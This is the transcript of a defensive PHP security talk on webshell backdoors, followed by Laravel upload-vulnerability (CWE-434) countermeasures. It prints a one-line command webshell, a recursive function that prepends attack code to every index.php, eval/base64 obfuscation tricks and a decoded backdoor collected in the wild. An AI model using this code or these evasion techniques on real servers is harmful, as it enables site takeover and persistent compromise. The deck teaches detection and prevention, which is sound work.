Understanding Backdoors by Building Them

Roku
March 23, 2023


Transcript

 1. Understanding Backdoors by Building Them
  Let's DIY

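 2. Self-introduction
  - Representative of AD5 Inc.
  - Currently registered as a Registered Information Security Specialist (… to present)
  - Spoke at PHPerKaigi: "True Scary Stories About Vulnerabilities"
  Roku @ad5jp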

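 3. Honestly, I would also like to give shiny talks about
  architecture theory or unit testing,
  but I am aiming for the position of Toku◯-san's successor,
  so this time it is a security topic again.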

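 4. A story from about … years ago
  - K: "Roku! I can't delete the .htaccess (crying)"
  - Me: "(Ah, probably permissions?) Which site is it?"
  - K: "It's 〇〇. The whole site has become unviewable (crying)"
  - Me: "(click, click) ... Huh? I was able to delete it."
  - K: "No matter how many times I delete it, it comes back every few minutes (tears)"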

 5. That is a backdoor.

 6. Today's contents
  - Overview of backdoors
  - How backdoors are built, with real examples
  - Countermeasures against backdoors

 7. Overview of backdoors

 8. Demo
  - Once upon a time, there was a perfectly ordinary mail form.

 9. Demo
  - A bad actor uploaded a file like this.

  rewriteindex.php

  $path = __DIR__ . '/../../../public/index.php';
  $code = "
  file_put_contents($path, $code);
  die('success');

 10. Demo
  - Then they clicked the file's preview link.

 11. Demo
  - Then they clicked the file's preview link.

 12. Demo
  - The entire site ended up like this.

 13. Various attack files
  - A nastier one.

  $path = __DIR__ . '/../../../public/index.php';
  $code = "
  file_put_contents($path, $code);
  die('success');

 14. Various attack files
  - Typically, this.

  file_put_contents($_POST['path'], $_POST['code']);
  exec($_POST['command']);

 15. If a file like this gets uploaded
  - It is effectively the same as a third party being able to operate the server freely
  = a back door into the server (a backdoor)

 16. Attack flow

 17. Attack flow

 18. Attack flow

 19. Attack flow

 20. Attack flow

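 21. Attack flow (summary)
  - The first attack file is placed on the server through a vulnerability.
  ↓
  - While carrying out the tampering that is its main purpose, it places a second and a third attack file in other locations.
  ↓
  - Even if the first attack file is removed, the second and third attack files repeat the tampering.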

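 22. In other words, a backdoor is
  - not the vulnerability itself, and not the goal of the attack itself.
  - an intermediate means of making an attack that succeeded once easy to continue and hard to eradicate.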

 23. Vulnerabilities that are the root cause
  - Unrestricted upload of file with dangerous type (CWE-434)
  - OS command injection (CWE-78)
  - And so on.

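 24. Main goals of the attack
  By tampering with the entry point (index.php) or .htaccess:
  - Redirect users to the attacker's site.
  - Make users download dangerous files.
  - Use the server as a stepping stone for DDoS attacks and the like.
  - Extract information such as .env.
  - Extract users' confidential information from sessions and the like.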

 25. How backdoors are built

 26. The earlier sample

  $path = __DIR__ . '/../../../public/index.php';
  $code = "
  file_put_contents($path, $code);
  die('success');

 27. The earlier sample

  $path = __DIR__ . '/../../../public/index.php';
  $code = "
  file_put_contents($path, $code);
  die('success');

  Tampering like this is still on the mild side.

 28. Stepping it up

  $code = <<<'EOM'
  if (empty($_SESSION) && empty($_COOKIE)) {
      header('Location: https://ad5.jp');
  }
  ?>
  EOM;
  $path = __DIR__ . '/../../../public/index.php';
  $code .= file_get_contents($path, $code);
  file_put_contents($path, $code);

 29. Stepping it up

  $code = <<<'EOM'
  if (empty($_SESSION) && empty($_COOKIE)) {
      header('Location: https://ad5.jp');
  }
  ?>
  EOM;
  $path = __DIR__ . '/../../../public/index.php';
  $code .= file_get_contents($path, $code);
  file_put_contents($path, $code);

  Without administrators or developers noticing,
  only first-time visitors keep getting redirected.

 30. An attack with a hard-coded path like this
  would never actually hit, right? lol

 31. Brute force using glob()

  function prepend($path) {
      $code .= file_get_contents($path, "…attack code…");
      file_put_contents($path, $code);
  }

  function prependRecursive($path) {
      if (file_exists("{$path}/index.php")) {
          prepend("{$path}/index.php");
      }
      foreach (glob("{$path}/*") as $child) {
          if (is_dir($child)) {
              prependRecursive($child);
          }
      }
  }

  prependRecursive($_SERVER["DOCUMENT_ROOT"]);

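 32. Targeting files that are hard to discover
  - Tamper with a file that always exists in the framework
    e.g. public/index.php
  - Plant a file whose name looks like it belongs to the framework
    e.g. load.php, locale.php
  - Plant a file in a directory that is .gitignore'd
    e.g. storage/public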

 33. With WordPress...
  - Tamper with files inside wp-admin or wp-includes, or plant files there
  - Tamper with files inside wp-content/plugins/xxx, or plant files there
  - Plant files inside wp-content/uploads

 34. If we grep for file_put_contents
  or fwrite,
  couldn't we clean them all out?

 35. Take this code, for example

  $path = __DIR__ . '/../../../public/index.php';
  $code = "
  file_put_contents($path, $code);

 36. Do this to it

  eval("$path = __DIR__ . '/../../../public/index.php';
  $code = \"\";file_put_contents($path, $code)");

 37. And then this


  eval(base64_decode("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8
  uLi9wdWJsaWMvaW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZG
  VyKCdMb2NhdGlvbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1d
  F9jb250ZW50cygkcGF0aCwgJGNvZGUp"));


 38. file_put_contents
  has disappeared.

 39. Then shouldn't we just grep for eval
  or base64_decode
  as well?

 40. PHP is flexible.


  $a = "eval";


  $b = "base64_decode";


  $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv
  aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl
  vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy
  gkcGF0aCwgJGNvZGUp"));


 41. PHP is flexible.


  $x = '0123456789abcdefghijklmnopqrstuvwxyz_';


  $a = $x[14].$x[31].$x[10].$x[21];


  $b = $x[11].$x[10].$x[28].$x[14].$x[6].$x[4].$x[36].
  $x[13].$x[14].$x[12].$x[24].$x[13].$x[14];


  $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv
  aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl
  vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy
  gkcGF0aCwgJGNvZGUp"));


 42. Every function name
  has disappeared from the code.

 43. grep cannot do it.

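 44. Note
  - The previous code contains one lie.
    eval is a language construct, not a function, so the following does not work:

    $a = "eval";
    $a();

  - In the real samples, that stage of the obfuscation most often used the [email protected] function (PHP …).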
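The limit of name-based grep from slides 34 to 43, seen from the defender's side, as an added example that is not part of the original deck: instead of searching for function names, it tokenizes PHP source and flags the structures the obfuscation relies on. `suspiciousConstructs()` and both sample sources are constructed for illustration; the samples are only tokenized, never executed.

```php
<?php
// Added example: flag obfuscation structures rather than function names.
function suspiciousConstructs(string $source): array
{
    $skip = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    // Drop whitespace and comments so "next token" checks are reliable.
    $tokens = array_values(array_filter(
        token_get_all($source),
        fn($t) => !is_array($t) || !in_array($t[0], $skip, true)
    ));
    $findings = [];
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            continue;
        }
        [$id, $text, $line] = $tok;
        if ($id === T_EVAL) {
            $findings[] = "line $line: eval";
        } elseif ($id === T_VARIABLE && ($tokens[$i + 1] ?? null) === '(') {
            // $a(...): the callee is picked at run time, so its name never appears.
            $findings[] = "line $line: variable function call $text()";
        } elseif ($id === T_CONSTANT_ENCAPSED_STRING
            && preg_match('~^["\'][A-Za-z0-9+/=]{80,}["\']$~', $text)) {
            $findings[] = "line $line: long base64-like literal";
        }
    }
    return $findings;
}

// Constructed, harmless payload: base64 of a repeated "echo 1; ".
$blob = base64_encode(str_repeat('echo 1; ', 12));
$samples = [
    'named'     => '<?php eval(base64_decode("' . $blob . '"));',
    'name-free' => '<?php $x = "abcdefghijklmnopqrstuvwxyz";' . "\n"
                 . '$f = $x[18].$x[19].$x[17];' . "\n"
                 . '$f("' . $blob . '");',
];
foreach ($samples as $label => $src) {
    $grepHit = preg_match('/eval|base64_decode/', $src) ? 'yes' : 'no';
    echo "$label: grep hit = $grepHit\n";
    foreach (suspiciousConstructs($src) as $finding) {
        echo "  $finding\n";
    }
}
```

Variable function calls also occur in legitimate framework code, so the findings are leads for manual review, not verdicts.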

 45. A backdoor actually collected in the wild (locale.php)

  Note: approx. … bytes
  0i9tvf_”76*.2n[je';$q2866=$tJvyYsXGpmgwi[(105/15)].
  $tJvyYsXGpmgwi[(26-1)].$tJvyYsXGpmgwi[(1*49)].
  $tJvyYsXGpmgwi[((10*1)+18)].$tJvyYsXGpmgwi[(14+22)].
  $tJvyYsXGpmgwi[(44+5)].$tJvyYsXGpmgwi[(44-13)].$tJvyYsXGpmgwi[(684/18)].
  $tJvyYsXGpmgwi[(23+4)].$tJvyYsXGpmgwi[(72-(33-7))].
  $tJvyYsXGpmgwi[(154/22)].$tJvyYsXGpmgwi[(11+25)].$tJvyYsXGpmgwi[(65-
  (62-31))].$tJvyYsXGpmgwi[(26-6)].$tJvyYsXGpmgwi[((27*2)-8)];
  $pHFdNhg9688=$tJvyYsXGpmgwi[(20-9)].$tJvyYsXGpmgwi[(2*4)].
  $tJvyYsXGpmgwi[(29*1)].$tJvyYsXGpmgwi[(160/4)];
  $MYtraky2482=$tJvyYsXGpmgwi[(8*5)].$tJvyYsXGpmgwi[((1+0)+2)].
  $tJvyYsXGpmgwi[(6+(1*(95/19)))].$tJvyYsXGpmgwi[(140/5)].
  $tJvyYsXGpmgwi[(522/18)].$tJvyYsXGpmgwi[(7*((7-3)-2))]. …ུ…

 46. Deciphered, it looked like this.

  $x = '7RxrU9tI8jP8CqGiIvtWyCYJSRYwgSTO4y4BziZ3l98Q…(omitted)…';
  $a = base64_decode($x);
  $b = gzinflate($a);
  eval($b);

 47. Once decoded:

  error_reporting(0);
  @set_time_limit(3600);
  @ignore_user_abort(1);
  $xmlname = 'mapss.xml';
  $dt = 0;
  $sitemap_file = 'sitemap';
  $mapnum = 2000;
  if(isset($_GET['dt'])){
      $dt = $_GET['dt'];
  }
  $site = @$_GET['smsite'];
  $jdir = '';
  $http_web = 'http';
  if(is_https()){
      $http = 'https';
  }else{
  …(omitted)…

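 48. Characteristics of locale.php
  - It sends fake sitemaps and similar data to Google.
    → To keep operators and users from noticing through Search Console or search-result alerts.
  - It targets directories that contain CSS, images and the like.
  - It fetches the content it writes to files from an external URL.
    → Probably the attacker's command server. By changing that content, the attacker can change the attack without modifying the attack file.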

 49. The full source and other samples are available here
  github.com/ad5jp/phperkaigi…

 50. Countermeasures against backdoors

 51. Do not let one get planted.

 52. That's all.

 53. Vulnerabilities that are the root cause
  - Unrestricted upload of file with dangerous type (CWE-434)
  - OS command injection (CWE-78)
  - And so on.

 54. Vulnerabilities that are the root cause
  - Unrestricted upload of file with dangerous type (CWE-434)
  - OS command injection (CWE-78)
  - And so on.
  Today I will narrow the talk down to this one.

 55. The inquiry form used in the demo

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $data = $request->input();
      $saving_path = storage_path('app/public/' . $_FILES['file']['name']);
      move_uploaded_file($_FILES['file']['tmp_name'], $saving_path);
      chmod($saving_path, 0755);
      $data['file_name'] = $_FILES['file']['name'];
      $data['file_url'] = url('storage/', $_FILES['file']['name']);
      session()->put('inquiry', $data);
      return redirect()->route('confirm');
  }

 56. Surely nobody would implement it like this,
  I would think, but...

 57. Then, is this safe?

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']);
      // (omitted)
  }

 58. Then, is this safe?

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']);
      // (omitted)
  }

  To give the conclusion first, it is safe under most conditions.
  Can you explain why it is safe, and under what conditions it becomes dangerous?

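 59. Why am I asking this?
  - Nobody sets out to create a vulnerability.
  - Real product specifications are complex, and the code is intricately tangled as well.
    As a result, the conditions under which a problem occurs happen to line up, and a vulnerability is born.
  - Accurate understanding is important.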

 60. Conditions for the attack to succeed
  ① Script files such as PHP can be uploaded.
  ② The upload destination is a public directory on the same server.
  ③ The uploaded file is executable.

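 61. Conditions and countermeasures
  ① Script files such as PHP can be uploaded.
  → Check the MimeType and allow uploads of only the minimum necessary kinds of file.
  ... Depending on the requirements, restricting the MimeType can be difficult.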

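 62. Conditions and countermeasures
  ② The upload destination is a public directory on the same server.
  → If uploaded files are kept in a non-public directory, they cannot be used in the attack.
    Likewise, if the files are kept somewhere other than the web server where the application is installed, the attack does not succeed.
  ... This too may not be achievable, depending on the requirements.
      And it is not a fundamental countermeasure in the first place.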

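 63. Conditions and countermeasures
  ③ The uploaded file is executable.
  More specifically, the following two conditions.
  A. It is saved under a file name that is interpreted as PHP or CGI (that is mapped to an execution handler).
  B. It is saved with executable permissions.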

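 64. Conditions and countermeasures
  ③-A It is saved under a file name that is interpreted as PHP or CGI.
  In general, unless the extension is .php, the file is not executed as PHP.
  (Even if it contains PHP code, it is harmless as long as it is treated as a plain text file.)
  Note: however, the above depends on the web server configuration (discussed later).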

 65. So what about this?

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']);
      // (omitted)
  }

 66. So what about this?

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']);
      // (omitted)
  }

  By default, when a .php file is uploaded, it is stored with no extension.

 67. Implementation of UploadedFile::store()
  The file name is determined by UploadedFile::hashName().
  The extension is decided by File::guessExtension().
  When a PHP file is uploaded, the MimeType is text/x-php and, following the definition in MimeTypes::MAP, the file is stored with no extension.

  UploadedFile … Illuminate\Http\UploadedFile
  File … Symfony\Component\HttpFoundation\File\File
  MimeTypes … Symfony\Component\Mime\MimeTypes

 68. Exception
  However, this behaviour can be changed by setting MimeTypes::$default.
  Because it is a static property, if it is set in, for example, a ServiceProvider, the whole application is affected.

  MimeTypes … Symfony\Component\Mime\MimeTypes

 69. This kind of implementation is also easy to fall into.

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $filename = Carbon::now()->format('Ymd_His.')
          . $uploaded_file->getClientOriginalExtension();
      $path = $uploaded_file->storePubliclyAs('upload', $filename,
          ['disk' => 'public']);
      // (omitted)
  }

  When saving under a naming rule such as a date or an ID in the file name:
  use guessExtension() rather than getClientOriginalExtension().

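 70. In the first place
  With Apache, for example, if httpd.conf or .htaccess contains a line like the following, even a .html extension is unsafe.

  AddHandler php-script .php .html

  In theory, depending on the configuration, a file with any name at all can be executed as PHP.
  You should not depend on the web server's configuration.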

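 71. Conditions and countermeasures
  ③-B It is saved with executable permissions.
  The owner of a file placed by PHP is normally the user PHP runs as, so if the owner has execute permission, it is unsafe.
  - 777 → rwxrwxrwx → unsafe
  - 666 → rw-rw-rw- → safe
  - 755 → rwxr-xr-x → unsafe
  - 644 → rw-r--r-- → safe
  - 700 → rwx------ → unsafe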

 72. So what about this?

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $uploaded_file = $request->file('file');
      $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']);
      // (omitted)
  }

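 73. Implementation of UploadedFile::store()
  I will skip the source-code reading, but...
  it depends on the disks.public.permissions setting in the configuration file (config/filesystems.php).
  By default, directories are 0755 or 0700, and files are 0644 or 0600.
  → Unless this setting has been changed, the code shown earlier results in permission 0644.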

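 74. Of course,
  if you call something like chmod($path, …) yourself, it is unsafe.
  I have seen implementations that take the mistaken advice
  "the storage folder should be set to permission …", misread it even further,
  and go out of their way to change the permission to … after saving the file...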

 75. By the way, in this case

  public function goConfirm(InquiryRequest $request) : RedirectResponse
  {
      $data = $request->input();
      $saving_path = storage_path('app/public/' . $_FILES['file']['name']);
      move_uploaded_file($_FILES['file']['tmp_name'], $saving_path);
      // (omitted)
  }

  Can you say what the permissions will be?

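 76. Permissions with file_put_contents() and the like
  - They depend on the OS setting (umask).
    In many environments, directories are … or …, and files are … or ….
  - You should not depend on OS settings either; handle this explicitly inside the application.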

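 77. Summary (countermeasures for CWE-434)
  - If the requirements allow it, restrict uploadable files by MimeType to the minimum necessary.
  - Give uploaded files non-executable permissions.
  - Give uploaded files non-executable file names.
  - Even Laravel's UploadedFile::store() becomes a dangerous implementation when several conditions coincide.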
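The three conditions from slides 60 to 76 handled explicitly in one place, as an added example in plain PHP that is not the deck's Laravel code. `ALLOWED`, `storeUpload()` and the directory layout are assumptions made for this sketch, and the two inputs are constructed; it needs the fileinfo extension.

```php
<?php
// Added example: allowlist by content, server-chosen name, explicit mode.
const ALLOWED = ['image/png' => 'png', 'image/gif' => 'gif', 'application/pdf' => 'pdf'];

function storeUpload(string $tmpPath, string $privateDir): string
{
    // Condition 1: decide from the file's content, never from the client's
    // file name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("rejected type: $mime");
    }
    // Condition 3-A: server-generated name; the extension comes only from
    // the allowlist, so a handler-mapped name like .php can never be chosen.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = rtrim($privateDir, '/') . '/' . $name;
    // Condition 2: $privateDir is expected to sit outside the document root.
    // A request handler would use move_uploaded_file(); copy() keeps this
    // demo runnable from the CLI.
    if (!copy($tmpPath, $dest)) {
        throw new RuntimeException('could not store file');
    }
    // Condition 3-B: set the mode explicitly instead of trusting umask
    // or framework configuration.
    chmod($dest, 0644);
    return $dest;
}

// Constructed inputs: a minimal GIF header and a one-line PHP script.
$dir = sys_get_temp_dir() . '/uploads_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0750);
$samples = [
    'pic.gif'    => "GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    'script.php' => "<?php echo 'x';",
];
foreach ($samples as $clientName => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    try {
        $path = storeUpload($tmp, $dir);
        printf("%s -> %s (%o)\n", $clientName, basename($path), fileperms($path) & 0777);
    } catch (RuntimeException $e) {
        printf("%s -> %s\n", $clientName, $e->getMessage());
    }
    unlink($tmp);
}
```

Content sniffing can be fooled, which is why the stored name and mode are fixed by the server regardless of what the type check concluded.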

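 78. Watch out for third-party libraries too
  - JVNDB-…
    Unrestricted upload of file with dangerous type vulnerability in the contact-form-7 plugin for WordPress
  - JVNDB-…
    OS command injection vulnerability in the XMLRPC API of Movable Type
  → Both led to large numbers of backdoor incidents.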

 79. We don't use WordPress,
  so we're fine?

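 80. Many of your customers
  - are probably using WordPress.
  - Even if it is not something you delivered or maintain, when they get into trouble they will come to you for advice.
  - Rather than treating it as someone else's problem, let's keep raising awareness.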

 81. And above all,
  - most backdoors are written in PHP.
  - As a PHPer, I cannot overlook that.

 82. If a backdoor has been planted

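 83. Basic policy
  - As described earlier, complete eradication is extremely difficult.
  - First, identify and eliminate the root-cause vulnerability.
  - After that, set up a separate server and
    A. restore from a backup taken before the attack.
    B. migrate only files that are confirmed safe, checking them by eye.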

 84. It is tremendously back-breaking and
  completely unproductive work,
  so it makes you want to die.

 85. Once you have been hit, it is too late.

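 86. The worst backdoor response in our company's history
  - A certain web production company came to us begging for help, and we took it on.
  - More than … sites were being run as multi-domain hosting on a rental server, and all of them were dragged down together.
    → A storm of complaints from the clients.
    → Even identifying the cause was extremely difficult.
    → Neither restoring nor migrating was realistic.
  - Full resolution took nearly … months.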

 87. I will say it once more.
  Once you have been hit, it is too late.

 88. Company introduction
  https://ad5.jp
  - A contract development vendor in Osaka.
  - A lively, bustling company.
  - Always hiring engineers.